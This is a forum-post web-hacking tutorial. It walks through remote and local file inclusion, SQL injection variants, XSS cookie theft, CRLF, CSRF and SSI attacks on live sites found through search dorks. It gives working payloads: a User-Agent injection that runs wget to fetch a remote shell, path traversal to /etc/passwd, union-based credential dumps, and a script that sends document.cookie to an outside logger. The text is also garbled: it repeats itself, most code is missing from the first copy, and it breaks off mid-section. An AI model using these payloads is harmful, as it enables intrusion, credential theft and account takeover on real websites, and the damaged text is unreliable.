THE BEST WEBSITE HACKING TUTORIAL
This is tutorial about web-hacking methods that I collected over past 1 year.
So I tought it would be nice if I share it here on Ubers.org.
It took me some time to write this Thread, so I have full credits.
If you like my tutorial please give me +rep, rate and comment.
Also if someone have more methods contact me with small guide and I will add it to Thread and of course give full credit.
Guide content:
[I] - Remote file inclusion
[1] RFI?
[2] Vulnerable script
[3] Exploiting vulnerability
[4] Null byte bypass
[5] Protection script
[II] Local file inclusion
[1] LFI?
[2] Finding vulnerable sites
[3] Checking site vulnerability
[4] Proc/self/environ
[5] Shell uploading
[III] Local file download
[1] LFD?
[2] Vulnerable script
[3] Vulnerability check
[4] Exploiting vulnerability
[5] Protection script
[IV] Full path disclosure
[V] MYSQL Injection
[1] Dorks
[2] Loging
[VI] SQL Injection - with load file
[1] SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding number of columns
[5] Finding vulnerable columns
[6] Finding database version
[7] Finding table name
[8] Finding column name
[9] Taking data from columns
[10] Filter bypassing
[11] Site protection from SQL Injection
[VII] MSSQL Injection
[1] Finding number of columns
[2] Finding database version
[3] Finding table name
[4] Finding column name
[5] Taking data from columns
[VIII] Blind SQL Injection
[1] Blind SQL Injection?
[2] Site vulnerability check
[3] Finding database version
[4] MYSQL user
[5] Finding table name
[6] Finding column name
[7] Taking data from columns
[8] Taking data from columns using sqpmap
[IX] Postgre SQL Injection
[1] Postgre SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding number of columns
[5] Finding vulnerable columns
[6] Finding database version
[7] Finding table name
[8] Finding column name
[9] Taking data from columns
[X]Error based Postgre SQL Injection
[1] Error based Postgre SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding database version
[5] Finding table name
[6] Finding column name
[7] Taking data from columns
[XI] SQL Injection on ASPX
[1] Site vulnerability check
[2] Finding table name
[3] Finding column name
[4] Finding columns in admin table
[5] Finding username and password
[XII] Dot net nuke
[XIII] XSS
[1] XSS?
[2] Required stuff
[3] XSS types
[4] Testing XSS vulnerability
[5] Cookie stealing
[6] Filter bypassing
[XIV] CRLF
[1] CRLF?
[2] Vulnerable places
[3] Exploiting vulnerability and protection
[4] Vulnerable script
[XV] CSRF
[1] CSRF?
[2] Vulnerable places
[3] Exploiting vulnerability
[XVI] Server Side Includes | Server Side Inclusion
[1] Introduction Server Side Includes
[2] SSI creating
[3] Server Side Inclusion
END
So lets get started!
[I] - Remote file inclusion
1) RFI?
RFI (Remote File Inclusion) is type of web-hacking. It occurs when the PHP script uses functions include () to include some files for a GET method. This file is usually in txt format pages whose content is printed.
Example:
Nowdays RFI is rarely in use and all you need to use it on some vulnerable site is shell in txt format.
2) Vulnerable script
3) Exploiting vulnerability
We have site:
Now instead of home we gonna use our shell.
So we get:
If site is vulnerable it should show shell with list of files from site you are attacking.
4) Null byte bypass
In some scripts there is a weak protection which is gonna include file and add html extension, or some other:
In that case we are gonna use null byte bypass().
Everything after would not count and use. We are also using for picture upload bypass as php, but I am not gonna talk about it.
So link should look like this:
5) Protection script
Script look like this:
So we gonna add some stuff to protect it:
[II] Local file inclusion
1) LFI?
LFI Can be used on sites like:
by adding
(sometimes you have to add on passwd).
2) Finding vulnerable sites:
3) Checking site vulnerability:
Find some site and use
or
When you enter this to link it writes this:
which means that site is vulnerable.
4) proc/self/environ
Now we want to see if we have access in /proc/self/environ over site so we can upload shell on site.
Instead of etc/passwd we are gonna put /proc/self/environ
If page print this:
then proc/self/environ is enabled so we can upload shell.
5) Shell uploading
To upload shell we need Mozilla:
Add-on Tamper Data:
Open site etc:
Tools > Tamper Data
click Start Tamper then refresh page and in user agent put next code:
Click ok. To access shell use:
[III] Local file download
1) LFD?
LFD (Local File Download) is vulnerability in script which is used to download files using GET method, but you can also use it with POST methid using add-on Tamer Data.
2) Vulnerable script
3) Vulnerability check
To check if script is vulnerable we are gonna try to download etc/passwd.
So instead of:
We are gonna use:
If it starts to download and if it open file in text editor it look something like this:
Script is vulnerable!
NOTE: If it is a windows server use boot.ini instead of etc/passwd.
4) Exploiting vulnerability
Now when we know that script is vulnerable, we want to see which files are on host. You can do this on this way:
../ is gonna back us one directory backward and download file.
1.1 It is possible when it download file and open in text editor to print file list in directories.
1.2 or it is either possible to download file but when it is opened in text editor file is empty.
In case 1.1 we dont have to guess file name and directory and we can download whatever we want.
In case 1.2 we must guess file name and directory and we can download only files which name we guess. There is a few program that can help us to find files (Acunetix and HTTrack Website Copier).
5) Protection script
We have script mentioned at start:
by adding if(file_exists("download/".$file) we are gonna secure script.
So it should look like:
[IV] Full path disclosure
This method let you over errors in file or over errors made by programmers to let you see which files are in which directories, over it you can't directly hack site, it just let you help while hacking.
It is useful because it can help you in faster and easier hacking, also it can help you with Local File Inclusion (LFI), when folder name is changed, or some other file. You can findout using FPD.
There is a lot of ways using FPD vulnerability on site, I'll explane you 2 most important.
1st is over array, by adding square brackets on link like this one:
To finish vulnerability attack is to add [] on destined place:
That will give you error like this:
From this you can see on site is it exists directory blah.
2nd method is to add most used cookie (Null Session Cookie), and you can add him by Java-injection, by adding java code on site you will get error.
This is javascript code:
add in your adress bar and hit enter, now when page is refreshed you will get error:
then try to open directory thems on site, that should list you files in that directory.
Protection:
Most simple way to protect from this attacks is to turn-off error reporting.
edit or add:
[V] MYSQL Injection
1) Dorks
I am gonna use:
2) Loging
Now you can find some site over these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--
Instaed of password' or 1=1 you can use some of these:
password' or 1=1 is gonna confuse server and will let you log in.
So if you are able to log in, site is vulnerable and you are gonna be able to use admin panel.
[VI] SQL Injection
1) SQL Injection?
SQL Injection is type of web attack. Attacker use hole in script to take all data from database. Vulnerable sites are in format:
You can put anything else instaed of index.
2) Finding vulnerable sites:
Best way to find vulnerable site is bay using google. We use this dorks to find sites:
3) Site vulnerability check:
There are 2 ways to check if site is vulnerable.
1st way, we got link:
we are gonna add only ' at end of link so we get this link:
2nd way, we got link:
we are gonna add +and+1=2-- at end of link so we get:
If some part of page dissapear (picture, text or something) or any error like (You have an error in your sql syntax) site is vulnerable.
4) Finding number of columns
We can do it by using function order by, on link:
adding +order+by+5--
If page is opens normal there is more then 5 columns. Lets try with 10.
Now some part of site dissapeared, which means that theres more then 5 and less then 10 columns. Lets try 7.
Page is opened normally which means that there is more then 7 and less then 10 columns. Lets try 8.
on column 8 part of site dissapear which means that there is 7 columns.
5) Finding vulnerable columns
Finding vulnerable columns is done with function uion select all on link (in this case) we are gonna add +union+select+all+1,2,3,4,5,6,7--
It is gonna write numbers on page (in this case 1 2 3 4 5 6 7) which means that data can be taken from any column. We are gonna take from second column.
6) Finding database version
As I said we are gonna take data from second column. Instead of number 2 we are gonna put version() or @@version
on page where number 2 was, it will show database version.
If database version is 4 we have to guess name of table and column, but if database version is 5 we have to guess database version.
We have version 5.0.51a-24+lenny5 which means that we dont have to guess name of table and column.
7) Finding table name
If database version is 4 you wont be able to find name of table and column, you have to guess their names. If database version is skip this step.
Names of some possible tables:
Names of some possible columns:
If database version is 5 we can take name of table by doing next step: instead of number 2 we gonna put group_concat(table_name) and after number of last column +from+information_schema.tables+where+table_schema=database()--
So we get this link:
Instead of number 2 it showed name of table, in this case date, book, users. We gonna take columns from users table.
8) Finding column name
We found table name that we want and now from that we want to take columns. Instead of group_concat(table_name) we gonna putgroup_concat(column_name) and instead of +from+information_schema.tables+where+table_schema=database()-- we gonna put+from+information_schema.columns+where+table_name=hex-- instead of hex we have to encrypt in hex name of table.
Go to:
write name of table (in this case users) and we get hex-ed number: 7573657273 so now can see columns:
9) Taking data from columns
We got: id, name, surname, username, password, level.
We need only username and password.
Instead of group_concat(column_name) we put group_concat(username,0x3a,password) 0x3a stands for to make space between user and pw. Instead offrom+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--
and we have link:
and result e.g.:
which is users and passwords from this site.
10) Filter bypassing
In case when you write union+select+all says "not accessible" then change it to UnIoN+sElEcT+aLl
On some sites space is restricted so you can put + or /**/ (/* start of comment in php and finish */)
On some sites there is also restricted database version so you can use unhex(hex(version()))
11) Site protection from SQL Injection
Just put this code in your script:
SQL Injection - Load File
You found site with SQL vulnerability, now you can try to access table mysql.user and file privileges.
To so which is user and do we have user privileges we are adding 'user' instead of vuln column and at end of url adding '+from+mysql.user--'.
It should look like this:
If you get username, it means that you have access to mysql.user table and you can continue with this tut.
Now to see if we have file privileges we have to instead of 'user' add 'concat(user,0x3a,file_priv)' and ofcourse '+from+mysql.user--'
Now when on page usernames and file priv. are listed you must find username which was written at start, when you was writing 'user' in column, when you find it and if besides him shows 'Y' which is Yes. You have privileges.
Load File:
All we have to do is to write on vuln column load_file('FILE NAME').
We gonna try with /etc/passwd, so we type in vuln column 'load_file('/etc/passwd').
Which look like this:
If it give us error we can convert file in Char or Hex, but if we do it we must delete " ' " in file name.
Hex e.g.
If we convert file name in Hex, before file name we adding '0x'
Hex code '2f6574632f706173737764' works for '/etc/passwd'.
It is recommender for Hex:
If you decide to convert file in Char then add 'load_file(char(converted file to char))'
Which looks like:
Where ' 47,101,116,99,47,112,97,115,115,119,100 ' works for '/etc/passwd'
Char converter:
[VII] MSSQL Injection
1) Finding number of columns
I will use:
To find column number we gonna use order by function. We gonna add +order+by+5-- at end of link.
So we gonna get next error:
which means that there is less then 5 columns, lets try with 4. We gonna get same error, so we gonna try with 3 and we get next error:
Which means that there is 3 columns.
2) Finding database version
To find database version we are using @@version.
and we get:
and from here we can see database version.
3) Finding table name
With MSSQL Injection it is not possible to get all tables at once, we must go 1 by 1.
and we get:
and we can see that we have table 'Country'.
Now we have to find other tables. We are gonna use not+in function. So we have link:
and we get:
and from here we can see that we have Admin table.
4) Finding column name
It is same for columns. We can not get all columns at once, so we have to do it 1 by 1. In this case we are gonna use where+table_name='Admin'--. So we have link:
and we have error:
From here we can see that we have column USERNAME. Now we need rest columns so we gonna use again not+in function.
and we get:
So columns is PASSWD.
5) Taking data from columns
Now we have to put name of table instead of table_name and everything after from we are puting name of table.
We get username OjuZwqAul.
It is same for password:
We get password M7sWt2!2uq.
[VIII] Blind SQL Injection
1) Blind SQL Injection?
Difference between SQL Injection and Blind SQL Injection is that Blind SQL Injection is not writing any errors, any table and column names or column content. So that is why it is called Blind SQL. You are just messing with part of site dissapearing - image, text, etc... In Blind Injection we dont use --i/* */.
2) Site vulnerability check
We have link:
We gonna add and 1=2
If any part of page dissapear, it means that site is vulnerable.
3) Finding database version
As we said already in this method nothing is gonna be showed, so we gonna say that database version is 4. If part of site dissapear it means that version is not 4, but if everything on page stay as it should it means that version is 4. We gonna use function @@version.
If page is loaded as it should then version is 4, if not, then we gonna try:
4) MYSQL user
First we gonna check are we able to use select because it is blocked sometimes.
If page is loaded normally we can use select, but if not then we can't use it. Now we gonna check do we have MYSQL user access.
Same as everything else, if page is loaded normally we have access to mysql.user, if not then we dont have. mysql.user is useful to get hash password or useload_file() and OUTFILE.
5) Finding table name
To find table names all we have to do is guess. First we gonna find table name then after column name from table.
We have link and we are gonna try to get names of different tables. If page is loaded normally it means that table name is there and exists.
Our main objective is to to find data from admin table, we can also use:
6) Finding column name
Now when we found name of table we wanted it is time to find column name. We doing same as for table. There is name matching, if page is loaded normally then column exists. We need loging data so commonly columns gonna be:
Link that we use for columns is:
7) Taking data from columns
In whole Blind SQL this gonna be most bored and longest part. Here we gonna need ascii table.
We gonna look only for DEC and CHR ascii tables. First we gonna get username, geting letter by letter. So we need to guess DEC for some letter, e.g. for A it is 65.
We have link:
If page load normally we found are real letter for username. To find our second letter change +limit+0,1 to +limit+1,1.
So now we are guessing second letter... It is same for password... So after long long time we get username and password. If there is more users and if you want to get their passwords too you will have to add where function.
So it should look like:
To use where for second column_name we usually using id, but we can also use other stuff. e.g. for id:
8) Taking data from columns using sqpmap
As you noticed already that you need a lot of time to get data from columns I would suggest you to use sqlmap.
Windows download:
Unix download:
NOTE: almost all unix systems have installed sqlmap already, and you will also need python if you do not have it already.
Python download:
Now we have to find directory where sqlmap is located.
Start>run>cmd and find sqlmap directory using cd function.
Function to start sqlmap for geting data with Blind SQL Injection for windows is:
NOTE: for unix put python before sqlmal.py
So it should look like:
If there is more users as I said then use id:
After -u you put link.
After -p you put parameter which is vulnerable (in our case id).
-a we are using for some random user agen-t from txt/user-agents.txt
-v1 is verbose
After --string stavljamo something that sqlmap is gonna recognize that he found letter (some part of text who dissapear if case is false).
-e is command that we want to execute. In our case this one:
[IX] Postgre SQL Injection
1) Postgre SQL Injection?
Postgre SQL Injection is almost same as SQL Injection. Difference is in Postgre base, not MySQL. It is a bit complicated attack then usually SQL Injection. There is some other functions that we are gonna use, you will see.
1) Finding vulnerable sites
Finding site vulnerability is same as usual SQL Injection, which means that we can use google dorks.
Here is some:
3) Site vulnerability check
You found site that may be vulnerable. To check if site is vulnerable we gonna add ' at end of link.
So if on page we get:
or some part of page dissapear then site is vulnerable.
4) Finding number of columns
So we know that site is vulnerable, now we need to find column number. We gonna do it with union function this time.
Our link:
If page is loaded normally that means that there is more columns.
We are adding null all the time till we get error. If we get error with 7 null, it means that we have 6 columns, which means 6 nulls.
5) Finding vulnerable columns
It is just so easy to find column vulnerability. Null = 0, which means that everything you put instead of certain null, if nothing happens it means that columns is not usable. That is how we gonna find vulnerable column.
So:
If there is nothing listed, it means that column is not usable we will move on next, and this one back to null.
6) Finding database version
We are doing this with version() function.
Link which gonna show us version:
we gonna get something like:
7) Finding table name
Same as usual SQL Injection, only diff. is that instead of column number we have null.
So it should look like:
We gonna get table names, and we gonna get columns from table.
8) Finding column name
It is also easy, and there is no big diff.
This is how it should look like:
Sometimes this wont work so we need to convert = from ascii in decimal.
You can use this site:
So we have link:
9) Taking data from columns
Also almost same as usual SQL Injection:
[X]Error based Postgre SQL Injection
1) Error based Postgre SQL Injection?
Error based Postgre SQL Injection is type of web attack releated to Postgre SQL base. Difference is that you can get all tables, columns and values from columns etc. As title says attack is based on errors, and all results will be shown in errors.
2) Finding vulnerable sites
Use google dorks:
3) Site vulnerability check
Add ' at end of link:
so if we get:
site is vulnerable.
4) Finding database version
Use version() function. In this type of attack query looks a bit complicated then usual SQL Injection so don't get confused.
If function is loaded successfully you will get this on page:
from where we get database version:
5) Finding table name
As I said at start we are not able to get all tables in same time so we gonna use limit and offset functions.
We gonna use offset to say which result from base we want to list.
Our link:
on page we will get this error:
from this we have table pg_type.
to get next table we gonna change offset to 1:
and we gonna get table like pg_attribute.
6) Finding column name
First you have to do is to convert table name into decimal.
We gonna use:
type string admin and you will get decimal code:
We gonna change this code a bit, so it should look like this:
Now we gonna put it for table names and get columns.
and we gonna get column id. We gonna change offset all the time till site back us on home page, which means that there is no more columns in that table.
7) Taking data from columns
We found column username and password and now we want to get data from column.
and we gonna get this:
CHR(58) presents two points (:) and we use to get two columns at same time.
NOTE: (Regard to whole tutorial) from now I'm not gonna explane it detailed, 'cause I think you should figure it out till now already. So I'm gonna use pics and codes only.
[XI] SQL Injection on ASPX
1) Site vulnerability check
Vulnerable link:
We gonna add order by 1--:
If you get page error go to:
2) Finding column name
Go to:
![[Image: img2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sC8c-Vehk2SmReKvMsE5ORJSmqakmojj77vqC-e9LvVT_vJztbfbuWfgvb_bvYlUJRcK6fp71q6hbyx67NzrgDAUbjoBxdxmCzLBLPJKg=s0-d)
3) Finding table name
![[Image: img3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uCArD_q6hEX_BlBuU-RCqR7fMC-n2rS7ZG5s8ajeB3O06XtCofPx2EfQVBtG0fX8RrLJi_iP9_hKHZaFlMBzI4M_yAinlf-CES0tG3-Q=s0-d)
We want admin table, so we type next:
![[Image: img4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_th8rtjhQea_FXIyVV2UN0VtQhz-utbSqBVlhCZ0r5j7-AULsoM8peQk55qT7IV0U5uHDM-JQw4hAm4PAHDlDaEad1yMmg2OjXhgtfXAJI=s0-d)
admin table name is AdminMaster
4) Finding columns in admin table
Columns names:
![[Image: img5.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_swarHgLIRvYzH0vt9IflSgusiwt2nRbbOoNWw96V2FBRPsbFHdUZrrqsiMLQ_icegtyaewvJe_HFTuQK4_yuqAzVpNc2gmmWagJaAmbe4=s0-d)
![[Image: img6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v98FFTxJP4i2xC7lHwPkygAF2paLuDQmaQA6j0xhCAgSo5hrCpgD08wGzP4jKy_QeD9v98Q5FGn8PKDygUUrLg6cg6YEuLAargEM2pJd4=s0-d)
5) Finding username and password
![[Image: img7.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tlHYYQqykYzUsXfZ5cW4Ann0zLIBKIcTcqwyBLUO7xpqbn5113RLGH32ffpshJbonq0T2OMnUOU8Y2XZN1ZAileKoilRPQehIsmpbZom0=s0-d)
![[Image: img8.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vc8qaqbksgONajI67GgekmyoJuvoLSCI6ABssnnA_sT6R6gJwswzN3uvsMp7QH4eVLEnGStvrITY5SonK9dvZdIEsGb-SBC7cIb-OrQQ=s0-d)
[XII] Dot net nuke
DNN is gallery where you can upload on site and in there you can hold pictures and have like "online gallery". That gallery have hole in itself so you can use it to upload files on site with extension: *.gif, *.jpg, *.pdf, *.txt, *.swf..
Google dork to find vulnerable sites:
I'm gonna use this site:
Now if page is loaded it will look like this:
![[Image: image.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vZUVaBgY7npmJ5YDtUphhI2EIREVXL3GpAfcWIjkHoGBLejmOmyFLaJ8RPty5bSRDhxciwfzn8mk0FI4-Gfedo0d9Z6jLZgD3AOePaIxuS=s0-d)
which means that we can continue. Now we choose option 3 -> File (A File On Your Site) and we type javascript to upload file.
Choose File and Text button Upload Selected File will show up.
*on this site letter colour matched with background so you will have to select whole page (CTRL+A) and you will see upload button.
![[Image: image.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uoFdtvFrC2DqZM4ObH_DrZFRJ7y0obThYhUG0EXkM9K-IxWr4KWSqX4Jy4z8ZTyAyVnUtKKAzeW_x1Ja_fwOvU79wwD0N7hwlit1m3MTIe=s0-d)
Upload file and access it by going to sitelink.com/portals/0/filename.extension
->
[XIII] XSS
1) XSS?
XSS lets attacker to execute Javascript code. XSS is shortcut of Cross Site Scripting.
You can use XSS for many ways. For simple Javascript executing commands, or you can use it to steal cookies. We are Injecting Cookies so we can login somewhere w/o password.
2) Required stuff
Mozila FireFox:
Add-on Firebug:
Add-on FireCookie:
Add-on Live HTTP Headers:
It is recommended to have primary knowledge of Javascripts.
3) Testing XSS vulnerability
Sites on which we can use this method are sites where is text input and submit button and on sites where you can use GET method to print something.
e.g. of GET method:
Command to check site vulnerability is:
Now I will explane what this command is doing:
<script> - opening script tag
alert("XSS") - window will pop-up saying "XSS"
</script> - close script tag
4) XSS types
Cookie stealing - we are stealing cookies from some user (commonly admin), and input cookie in our browser so when we login to site we are gonna be logged in alrdy.
Cross-Site Request Forgery - we are sending some commands without knowing username.
XSS Worms - it is "evil" script that have possibility to spread over whole site.
Door-Forwarding - script makes iframe which will exploit something or start download some virus, rat, keylogger, istealer, etc...
Keylogging - you know what keylogging is.
5) Cookie stealing
For cookie stealing we will need:
-Vulnerable site
-Web-host for scripts
-php script
attach this script on some hosting:
cookie.php
script executing:
How this works?
When some user log on page with your cookie logger and you save his cookie. Then we take cookie and use it. So here is how we do it:
1) Open Mozilla
2) Open Add-on Fire bug
![[Image: aa2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_viQCfw4hDVY7HK8akYbWb6IXPumsrNjEkHi7TfWRY2gcjZx1US9KcD79YmkNe7MTtYD-VcnqkleC6TkGzhCxS_mrS5dt02XmuSDhOk=s0-d)
3) Type cookie name and value. Here is one:
from this cookie title is PHPSESSID
from this cookie value is b3e4e100ab6bb912de1b80c4eed7898
6) Filter bypassing
1) Deleting script tag
e.g. if we type <script>alert("XSS")</script> and he put only command alert("XSS"). This script delete tags <script> and </script>
Here is also how to bypass protection: Instead of <script>alert("XSS")</script> we gonna put <scr<script>ipt>alert("XSS")</scr</script>ipt>
2) magic_quotes
Explained here:
If you type <script>alert("XSS")</script> and it prints <script>alert(\"XSS\")</script> then it is magic_quotes protection.
It is a bit harder to bypass magic_quotes protection. It works over String.fromCharCode.
Here is example:
This is link of our cookie logger: http://link.com/cookie.php we would use <script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script> into:
This works when you add \ code ' or " and when you use integer you do not use ' or "
and here: http://www.link.com/cookie.php?cookie= we also converted decimal code with this tool:
[XIV] CRLF
1) CRLF?
Shortcut from Carriage Return and Line Feed. CRLF is very easy to use. It is actually like we are adding new row (\n).
2) Vulnerable places
Vulnerable places are anywhere. In this tut. I'm gonna use some chat.
3) Exploiting vulnerability and protection
Lets say if you send message chat will look like this:
If chat is vulnerable, it's gonna look like this:
We wrote second msg from Admin and users will think that Admin sent it actually and will log in to site we gave them. With login we are gonna keylog site logins.
4) Vulnerable script
e.g.
[XV] CSRF
1) CSRF?
Shortcut from Cross Site Request Forgery. CSRF is mix of XSS and LFI. It is used to execute something without knowing username.
2) Vulnerable places
Can be used when you are using GET method. If CSRF is dont successfully, attacker can change password of some user. Most common vulnerable places are avatars.
3) Exploiting vulnerability
Lets say we have profile link:
Where you can see user data (username, avatar, email...).
Now when user want to edit his profile using e.g.
Now instead of avatar link we gonna add link from profile editing together with new code using GET method.
NOTE: We have to use GET method during profile editing otherwise we wont be able to attack.
Add avatar link:
password is name of input (It can be different, it's best to chekc source code)
Now when we look at avatar we wont be able to see picture (like there is no picture). When other user watch your avatar, if attack was successful, his password is gonna be changed in one we put.
[XVI] Server Side Includes | Server Side Inclusion
1) Introduction Server Side Includes
Server Side includes enables us to do some things faster on sites. Over SSIncludes we ca update DB, send mails and many other functions. SSI is working like when some run script on that site. Default extension for SSI files is .shtml
To get SSI working in that directory where is .shtml is located must be .htaccess file, which holds some configuration included inside file.
SSIs is by default disabled you can enable it by creating new .htaccess file with this config:
2) SSI creating
We are starting script with <!--#
Some simple script look like this:
<command> <variable>=<variable content>-->
<command> -
With --> we end script.
script e.g.
3) Server Side Inclusion
Server Side Inclusion Attack is very useful attacking method. For this it's recommended to have primary knowledge of Bash and Batch programming.
Site is vulnerable on SSI when extensions �.shtml� �.shtm� or �.stm�, are included in Apache config file.
e.g. we can create file with next command:
Save this as .shtml file and open it on site.
I think you already know what is going to happ.
So I tought it would be nice if I share it here on Ubers.org.
It took me some time to write this Thread, so I have full credits.
If you like my tutorial please give me +rep, rate and comment.
Also if someone have more methods contact me with small guide and I will add it to Thread and of course give full credit.
Guide content:
[I] - Remote file inclusion
[1] RFI?
[2] Vulnerable script
[3] Exploiting vulnerability
[4] Null byte bypass
[5] Protection script
[II] Local file inclusion
[1] LFI?
[2] Finding vulnerable sites
[3] Checking site vulnerability
[4] Proc/self/environ
[5] Shell uploading
[III] Local file download
[1] LFD?
[2] Vulnerable script
[3] Vulnerability check
[4] Exploiting vulnerability
[5] Protection script
[IV] Full path disclosure
[V] MYSQL Injection
[1] Dorks
[2] Loging
[VI] SQL Injection - with load file
[1] SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding number of columns
[5] Finding vulnerable columns
[6] Finding database version
[7] Finding table name
[8] Finding column name
[9] Taking data from columns
[10] Filter bypassing
[11] Site protection from SQL Injection
[VII] MSSQL Injection
[1] Finding number of columns
[2] Finding database version
[3] Finding table name
[4] Finding column name
[5] Taking data from columns
[VIII] Blind SQL Injection
[1] Blind SQL Injection?
[2] Site vulnerability check
[3] Finding database version
[4] MYSQL user
[5] Finding table name
[6] Finding column name
[7] Taking data from columns
[8] Taking data from columns using sqpmap
[IX] Postgre SQL Injection
[1] Postgre SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding number of columns
[5] Finding vulnerable columns
[6] Finding database version
[7] Finding table name
[8] Finding column name
[9] Taking data from columns
[X]Error based Postgre SQL Injection
[1] Error based Postgre SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding database version
[5] Finding table name
[6] Finding column name
[7] Taking data from columns
[XI] SQL Injection on ASPX
[1] Site vulnerability check
[2] Finding table name
[3] Finding column name
[4] Finding columns in admin table
[5] Finding username and password
[XII] Dot net nuke
[XIII] XSS
[1] XSS?
[2] Required stuff
[3] XSS types
[4] Testing XSS vulnerability
[5] Cookie stealing
[6] Filter bypassing
[XIV] CRLF
[1] CRLF?
[2] Vulnerable places
[3] Exploiting vulnerability and protection
[4] Vulnerable script
[XV] CSRF
[1] CSRF?
[2] Vulnerable places
[3] Exploiting vulnerability
[XVI] Server Side Includes | Server Side Inclusion
[1] Introduction Server Side Includes
[2] SSI creating
[3] Server Side Inclusion
END
So lets get started!
[I] - Remote file inclusion
1) RFI?
RFI (Remote File Inclusion) is type of web-hacking. It occurs when the PHP script uses functions include () to include some files for a GET method. This file is usually in txt format pages whose content is printed.
Example:
Code:
http://www.site.com/index.php?page=homeNowdays RFI is rarely in use and all you need to use it on some vulnerable site is shell in txt format.
2) Vulnerable script
Code:
<?php
$page = $_GET['page'];
include($page);
?>3) Exploiting vulnerability
We have site:
Code:
http://www.site.com/index.php?page=homeNow instead of home we gonna use our shell.
So we get:
Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?If site is vulnerable it should show shell with list of files from site you are attacking.
4) Null byte bypass
In some scripts there is a weak protection which is gonna include file and add html extension, or some other:
Code:
<?php
$page = $_GET['page'];
include($page.".html");
?>In that case we are gonna use null byte bypass().
Everything after would not count and use. We are also using for picture upload bypass as php, but I am not gonna talk about it.
So link should look like this:
Code:
http://www.site.com/index.php?page=www.shell-link.com/shell.txt?5) Protection script
Script look like this:
Code:
<?php
$page = $_GET['page'];
include($page);
?>So we gonna add some stuff to protect it:
Code:
<?php
$page = $_GET['page'];
if(file_exists("pages/".$page) {
include($page);
}
?>[II] Local file inclusion
1) LFI?
LFI Can be used on sites like:
Code:
http://link.com/index.php?page=by adding
Code:
../../../../../../etc/passwd2) Finding vulnerable sites:
Code:
index.php?page=
index.php?option=
search.php?word=3) Checking site vulnerability:
Find some site and use
Code:
../../../../../../../../../../../etc/passwdCode:
../../../../../../../../../../../etc/passwdWhen you enter this to link it writes this:
Code:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian-exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false ntp:x:103:106::/home/ntp:/bin/false snmp:x:104:65534::/var/lib/snmp:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin4) proc/self/environ
Now we want to see if we have access in /proc/self/environ over site so we can upload shell on site.
Instead of etc/passwd we are gonna put /proc/self/environ
If page print this:
Code:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2a d7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fpr oc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc% 2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster**website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Serv..........then proc/self/environ is enabled so we can upload shell.
5) Shell uploading
To upload shell we need Mozilla:
Code:
http://www.mozilla.com/firefox/Add-on Tamper Data:
Code:
https://addons.mozilla.org/en-US/firefox/addon/tamper-data/Open site etc:
Code:
http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/self/environTools > Tamper Data
click Start Tamper then refresh page and in user agent put next code:
Code:
<?system('wget www.link.com/shell.txt -O shell.php');?>Click ok. To access shell use:
Code:
www.link.com/shell.php[III] Local file download
